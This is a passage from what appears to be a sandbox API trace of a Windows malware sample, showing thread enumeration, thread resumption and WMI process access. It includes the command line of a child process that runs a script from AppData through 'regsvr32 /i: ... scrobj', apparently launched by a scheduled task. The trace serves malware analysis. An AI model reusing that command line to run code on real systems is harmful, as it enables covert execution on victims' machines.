(hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.452] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.452] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.452] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.452] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.453] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.453] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.453] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.454] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.454] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.454] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.454] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.455] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.455] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.455] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.612] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.612] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.612] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.613] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.613] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.613] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.614] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.614] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.614] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.614] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.615] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.615] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.615] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.616] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.616] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.616] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.616] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.617] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.617] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.617] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.618] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.618] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.618] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.619] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.619] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.619] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.619] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.620] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.620] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.620] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.621] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.621] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.621] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.621] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.622] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.622] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.622] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.623] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.623] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.623] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.624] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.624] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.624] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.624] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.625] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.625] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.625] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.626] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.626] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.626] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.626] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.627] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.627] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.627] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.628] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.628] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.628] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.629] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.629] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.629] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.629] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.630] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.630] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.630] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.631] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.631] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.631] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.632] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.632] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.632] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.632] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.633] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.633] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.633] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.634] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.634] Thread32Next (hSnapshot=0x140, lpte=0x2b0fc50) returned 1 [0169.811] ResumeThread (hThread=0x154) returned 0x1 [0169.811] CloseHandle (hObject=0x154) returned 1 [0169.812] ResumeThread (hThread=0x154) returned 0x1 [0169.812] CloseHandle (hObject=0x154) returned 1 [0169.812] ResumeThread (hThread=0x154) returned 0x1 [0169.812] CloseHandle (hObject=0x154) returned 1 [0169.812] ResumeThread (hThread=0x154) returned 0x1 [0169.812] CloseHandle (hObject=0x154) returned 1 [0169.813] ResumeThread (hThread=0x154) returned 0x1 [0169.813] CloseHandle (hObject=0x154) returned 1 [0169.813] ResumeThread (hThread=0x154) returned 0x0 [0169.813] CloseHandle (hObject=0x154) returned 1 [0169.816] VirtualQuery (in: lpAddress=0x30ad00, lpBuffer=0x2b0fc10, dwLength=0x30 | out: lpBuffer=0x2b0fc10*(BaseAddress=0x30a000, AllocationBase=0x2b0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0169.816] GetProcessHeap () returned 0x2b0000 [0169.816] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30ad00 | out: hHeap=0x2b0000) returned 1 [0169.816] VirtualQuery (in: lpAddress=0x2ee680, lpBuffer=0x2b0fc10, dwLength=0x30 | out: lpBuffer=0x2b0fc10*(BaseAddress=0x2ee000, AllocationBase=0x2b0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0169.817] GetProcessHeap () returned 0x2b0000 [0169.817] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee680 | out: hHeap=0x2b0000) returned 1 [0169.817] RtlExitUserThread (Status=0x0) Thread: id = 247 os_tid = 0xa80 Thread: id = 251 os_tid = 0x974 Process: id = "6" image_name = "regsvr32.exe" filename = "c:\\windows\\system32\\regsvr32.exe" page_root = "0x542e2000" os_pid = "0x114" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x790" cmd_line = "C:\\Windows\\system32\\regsvr32.EXE /s /n /u /i:\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw\" scrobj" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 125 os_tid = 0x274 [0098.629] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x23f8e0 | out: lpSystemTimeAsFileTime=0x23f8e0*(dwLowDateTime=0xbefdbc10, dwHighDateTime=0x1d59514)) [0098.629] GetCurrentProcessId () returned 0x114 [0098.630] GetCurrentThreadId () returned 0x274 [0098.630] GetTickCount () returned 0x115226f [0098.630] QueryPerformanceCounter (in: lpPerformanceCount=0x23f8e8 | out: lpPerformanceCount=0x23f8e8*=21885214883) returned 1 [0098.630] GetStartupInfoW (in: lpStartupInfo=0x23f890 | out: lpStartupInfo=0x23f890*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d59514befdbc10, hStdOutput=0x51875e0a3, hStdError=0x0)) [0098.630] GetModuleHandleW (lpModuleName=0x0) returned 0xff760000 [0098.630] __set_app_type (_Type=0x2) [0098.630] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff762a70) returned 0x0 [0098.630] __wgetmainargs (in: _Argc=0xff764780, _Argv=0xff764790, _Env=0xff764788, _DoWildCard=0, _StartInfo=0xff764010 | out: _Argc=0xff764780, _Argv=0xff764790, _Env=0xff764788) returned 0 [0098.631] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.631] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw") returned 53 [0098.631] wcscpy_s (in: _Destination=0x23ee00, _SizeInWords=0x105, _Source="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw" | out: _Destination="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw") returned 0x0 [0098.631] lstrlenW (lpString="scrobj") returned 6 [0098.631] OleInitialize (pvReserved=0x0) returned 0x0 [0098.644] SetErrorMode (uMode=0x1) returned 0x8001 [0098.645] _wsplitpath_s (in: _FullPath="scrobj", _Drive=0x0, _DriveCount=0x0, _Dir=0x0, _DirCount=0x0, _Filename=0x0, _FilenameCount=0x0, _Ext=0x23df40, _ExtCount=0x100 | out: _Drive=0x0, _Dir=0x0, _Filename=0x0, _Ext="") returned 0x0 [0098.645] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="", ulOptions=0x0, samDesired=0x1, phkResult=0x23df28 | out: phkResult=0x23df28*=0xffffffff80000000) returned 0x0 [0098.645] RegQueryValueW (in: hKey=0xffffffff80000000, lpSubKey=0x0, lpData=0x23e140, lpcbData=0x23df20 | out: lpData="", lpcbData=0x23df20) returned 0x0 [0098.646] RegCloseKey (hKey=0xffffffff80000000) returned 0x0 [0098.646] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="", ulOptions=0x0, samDesired=0x1, phkResult=0x23df28 | out: phkResult=0x23df28*=0xffffffff80000000) returned 0x0 [0098.646] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="AutoRegister", ulOptions=0x0, samDesired=0x1, phkResult=0x23df30 | out: phkResult=0x23df30*=0x0) returned 0x2 [0098.646] RegCloseKey (hKey=0xffffffff80000000) returned 0x0 [0098.646] SetErrorMode (uMode=0x1) returned 0x1 [0098.646] LoadLibraryExW (lpLibFileName="scrobj", hFile=0x0, dwFlags=0x8) returned 0x7fef8650000 [0098.835] SetErrorMode (uMode=0x1) returned 0x1 [0098.835] GetProcAddress (hModule=0x7fef8650000, lpProcName="DllInstall") returned 0x7fef865e7a8 [0098.836] DllInstall (bInstall=0, pszCmdLine="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw") returned 0x80020006 [0099.122] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x23c370 | out: lpSystemTimeAsFileTime=0x23c370*(dwLowDateTime=0xbf263370, dwHighDateTime=0x1d59514)) [0099.122] GetCurrentProcessId () returned 0x114 [0099.123] GetCurrentThreadId () returned 0x274 [0099.123] GetTickCount () returned 0x1152379 [0099.123] QueryPerformanceCounter (in: lpPerformanceCount=0x23c378 | out: lpPerformanceCount=0x23c378*=21934516614) returned 1 [0099.125] malloc (_Size=0x100) returned 0x4066d0 [0099.125] __dllonexit () returned 0x7fef5290728 [0099.126] __dllonexit () returned 0x7fef5290780 [0099.126] __dllonexit () returned 0x7fef5290750 [0099.127] __dllonexit () returned 0x7fef52907b0 [0099.127] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdbf0000 [0099.128] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegisterTraceGuidsA") returned 0x76f6f570 [0099.128] EtwRegisterTraceGuidsA () returned 0x0 [0099.128] EtwRegisterTraceGuidsA () returned 0x0 [0099.129] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x23bf60, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\regsvr32.EXE" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20 [0099.130] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegOpenKeyExA") returned 0x7fefdc0b5f0 [0099.130] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x23c0c8 | out: phkResult=0x23c0c8*=0x0) returned 0x2 [0099.135] GetVersion () returned 0x1db10106 [0099.137] ??2@YAPEAX_K@Z () returned 0x4067e0 [0099.138] ??2@YAPEAX_K@Z () returned 0x408990 [0099.138] GetUserDefaultLCID () returned 0x409 [0099.138] GetACP () returned 0x4e4 [0099.138] ??3@YAXPEAX@Z () returned 0x111c1701 [0099.138] GetCurrentThreadId () returned 0x274 [0099.139] ??2@YAPEAX_K@Z () returned 0x408d80 [0099.139] GetCurrentThreadId () returned 0x274 [0099.139] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x23dff8 | out: phkResult=0x23dff8*=0xd0) returned 0x0 [0099.139] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegQueryValueExA") returned 0x7fefdc0c480 [0099.139] RegQueryValueExA (in: hKey=0xd0, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x23dff0, lpData=0x23dfe8, lpcbData=0x23dfe0*=0x4 | out: lpType=0x23dff0*=0x4, lpData=0x23dfe8*=0x1, lpcbData=0x23dfe0*=0x4) returned 0x0 [0099.139] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegCloseKey") returned 0x7fefdc10710 [0099.139] RegCloseKey (hKey=0xd0) returned 0x0 [0099.139] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefe2b0000 [0099.140] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CoGetObjectContext") returned 0x7fefe2cc920 [0099.140] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe2b0000 [0099.140] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CoCreateInstance") returned 0x7fefe2d7490 [0099.140] CoCreateInstance (in: rclsid=0x7fef52fcba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef52fcd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x23dfc0 | out: ppv=0x23dfc0*=0x7fefe48a1b0) returned 0x0 [0099.143] ??2@YAPEAX_K@Z () returned 0x408dd0 [0099.143] ??2@YAPEAX_KHPEBDH@Z () returned 0x408e90 [0099.143] ??2@YAPEAX_K@Z () returned 0x408eb0 [0099.143] ??2@YAPEAX_K@Z () returned 0x407f80 [0099.144] ??2@YAPEAX_K@Z () returned 0x408f10 [0099.144] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x23df80, nSize=0x27 | out: lpBuffer="") returned 0x0 [0099.144] GetSystemDefaultLCID () returned 0x409 [0099.144] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x23e020, cchData=6 | out: lpLCData="1252") returned 5 [0099.144] IsValidCodePage (CodePage=0x4e4) returned 1 [0099.144] CoCreateInstance (in: rclsid=0x7fef52f5d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef52f5d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x408d00 | out: ppv=0x408d00*=0x45f970) returned 0x0 [0099.144] IUnknown:AddRef (This=0x45f970) returned 0x2 [0099.144] GetCurrentProcessId () returned 0x114 [0099.144] GetCurrentThreadId () returned 0x274 [0099.144] GetTickCount () returned 0x1152388 [0099.144] ISystemDebugEventFire:BeginSession (This=0x45f970, guidSourceID=0x7fef52f5da8, strSessionName="JScript:00000276:00000628:18162568") returned 0x0 [0099.145] GetCurrentThreadId () returned 0x274 [0099.146] GetCurrentThreadId () returned 0x274 [0099.146] realloc (_Block=0x0, _Size=0xc8) returned 0x4084c0 [0099.146] ??2@YAPEAX_K@Z () returned 0x408590 [0099.146] malloc (_Size=0x1008) returned 0x408fb0 [0099.147] ??2@YAPEAX_K@Z () returned 0x409fc0 [0099.147] malloc (_Size=0x108) returned 0x40a170 [0099.148] malloc (_Size=0x208) returned 0x40a280 [0099.148] ??3@YAXPEAX@Z () returned 0x111c1701 [0099.148] malloc (_Size=0x40) returned 0x4085d0 [0099.148] malloc (_Size=0x2c0) returned 0x40a490 [0099.148] ??2@YAPEAX_K@Z () returned 0x408620 [0099.148] free (_Block=0x408fb0) [0099.148] ??3@YAXPEAX@Z () returned 0x111c1701 [0099.148] free (_Block=0x4085d0) [0099.148] free (_Block=0x40a280) [0099.148] free (_Block=0x40a170) [0099.148] ??2@YAPEAX_K@Z () returned 0x408590 [0099.149] ??2@YAPEAX_K@Z () returned 0x4085f0 [0099.149] malloc (_Size=0x10) returned 0x408640 [0099.149] ??2@YAPEAX_K@Z () returned 0x40a760 [0099.149] CoGetObjectContext (in: riid=0x7fef52f6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x23ddb8 | out: ppv=0x23ddb8*=0x450060) returned 0x0 [0099.193] ??2@YAPEAX_K@Z () returned 0x409690 [0099.194] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fefe48a1b0, pUnk=0x409690, riid=0x7fef52f6340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x4096c8 | out: pdwCookie=0x4096c8*=0x100) returned 0x0 [0099.195] IUnknown:AddRef (This=0x450060) returned 0x2 [0099.195] IUnknown:Release (This=0x450060) returned 0x1 [0099.195] ??2@YAPEAX_K@Z () returned 0x40c7e0 [0099.196] GetTickCount () returned 0x11523c7 [0099.196] ??2@YAPEAX_K@Z () returned 0x409ca0 [0099.196] CoGetObjectContext (in: riid=0x7fef52f6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x23de08 | out: ppv=0x23de08*=0x450060) returned 0x0 [0099.197] IUnknown:Release (This=0x450060) returned 0x1 [0099.197] ??2@YAPEAX_K@Z () returned 0x409d60 [0099.197] ISystemDebugEventFire:IsActive (This=0x45f970) returned 0x1 [0099.197] CoGetObjectContext (in: riid=0x7fef52f6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x23dda8 | out: ppv=0x23dda8*=0x450060) returned 0x0 [0099.197] IUnknown:Release (This=0x450060) returned 0x1 [0099.198] malloc (_Size=0x988) returned 0x40d160 [0099.198] GetCurrentThreadId () returned 0x274 [0099.199] ??2@YAPEAX_K@Z () returned 0x409e40 [0099.199] ??2@YAPEAX_K@Z () returned 0x409ef0 [0099.199] malloc (_Size=0x80) returned 0x409fa0 [0099.199] malloc (_Size=0x108) returned 0x40a920 [0099.199] SysStringLen (param_1=0x0) returned 0x0 [0099.199] SysStringLen (param_1="winmgmts:Win32_Process") returned 0x16 [0099.200] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CreateBindCtx") returned 0x7fefe2d6730 [0099.200] CreateBindCtx (in: reserved=0x0, ppbc=0x23be40 | out: ppbc=0x23be40*=0x472400) returned 0x0 [0099.200] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="MkParseDisplayName") returned 0x7fefe2b9c5c [0099.200] MkParseDisplayName (in: pbc=0x472400, szUserName="winmgmts:Win32_Process", pchEaten=0x23be30, ppmk=0x23be38 | out: pchEaten=0x23be30, ppmk=0x23be38*=0x48bdd0) returned 0x0 [0099.403] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x23a020 | out: lpSystemTimeAsFileTime=0x23a020*(dwLowDateTime=0xbf406290, dwHighDateTime=0x1d59514)) [0099.403] GetCurrentProcessId () returned 0x114 [0099.403] GetCurrentThreadId () returned 0x274 [0099.403] GetTickCount () returned 0x1152424 [0099.403] QueryPerformanceCounter (in: lpPerformanceCount=0x23a028 | out: lpPerformanceCount=0x23a028*=21962600213) returned 1 [0099.404] malloc (_Size=0x100) returned 0x40ac50 [0099.404] DllGetClassObject (in: rclsid=0x468830*(Data1=0x172bddf8, Data2=0xceea, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), riid=0x23b7e0*(Data1=0x11a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x23aae0 | out: ppv=0x23aae0*=0x0) returned 0x80004002 [0099.404] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2421370 [0099.404] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.405] DllGetClassObject (in: rclsid=0x468830*(Data1=0x172bddf8, Data2=0xceea, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), riid=0x7fefe436cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x23ba38 | out: ppv=0x23ba38*=0x2421370) returned 0x0 [0099.405] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2421370 [0099.405] WinMGMTS:IClassFactory:CreateInstance (in: This=0x2421370, pUnkOuter=0x0, riid=0x7fefe43d650*(Data1=0x11a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x23ba88 | out: ppvObject=0x23ba88*=0x24213d0) returned 0x0 [0099.406] GetVersionExW (in: lpVersionInformation=0x23b7b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x20, dwBuildNumber=0x0, dwPlatformId=0x2420298, szCSDVersion="") | out: lpVersionInformation=0x23b7b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0099.406] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Wbem\\Scripting", ulOptions=0x0, samDesired=0x1, phkResult=0x23b7a0 | out: phkResult=0x23b7a0*=0x144) returned 0x0 [0099.407] RegQueryValueExW (in: hKey=0x144, lpValueName="Default Impersonation Level", lpReserved=0x0, lpType=0x0, lpData=0x23b794, lpcbData=0x23b790*=0x4 | out: lpType=0x0, lpData=0x23b794*=0x3, lpcbData=0x23b790*=0x4) returned 0x0 [0099.407] RegCloseKey (hKey=0x144) returned 0x0 [0099.407] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2421390 [0099.407] GetSystemDirectoryW (in: lpBuffer=0x2421390, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0099.407] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\advapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdbf0000 [0099.407] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="DuplicateTokenEx") returned 0x7fefdbfd310 [0099.407] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.407] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2421390 [0099.407] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x24213d0 [0099.408] WinMGMTS:IUnknown:Release (This=0x2421370) returned 0x0 [0099.408] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0099.408] WinMGMTS:IParseDisplayName:ParseDisplayName (in: This=0x24213d0, pbc=0x472400, pszDisplayName="winmgmts:Win32_Process", pchEaten=0x23be18, ppmkOut=0x23bdc0 | out: pchEaten=0x23be18*=0x16, ppmkOut=0x23bdc0*=0x48bdd0) returned 0x0 [0099.408] _wcsnicmp (_String1="winmgmts:", _String2="WINMGMTS:", _MaxCount=0x9) returned 0 [0099.408] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x24213f0 [0099.409] _wcsnicmp (_String1="W", _String2="{", _MaxCount=0x1) returned -4 [0099.409] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2421430 [0099.409] CoCreateInstance (in: rclsid=0x7fef7ad1738*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef7ad16c8*(Data1=0xdc12a687, 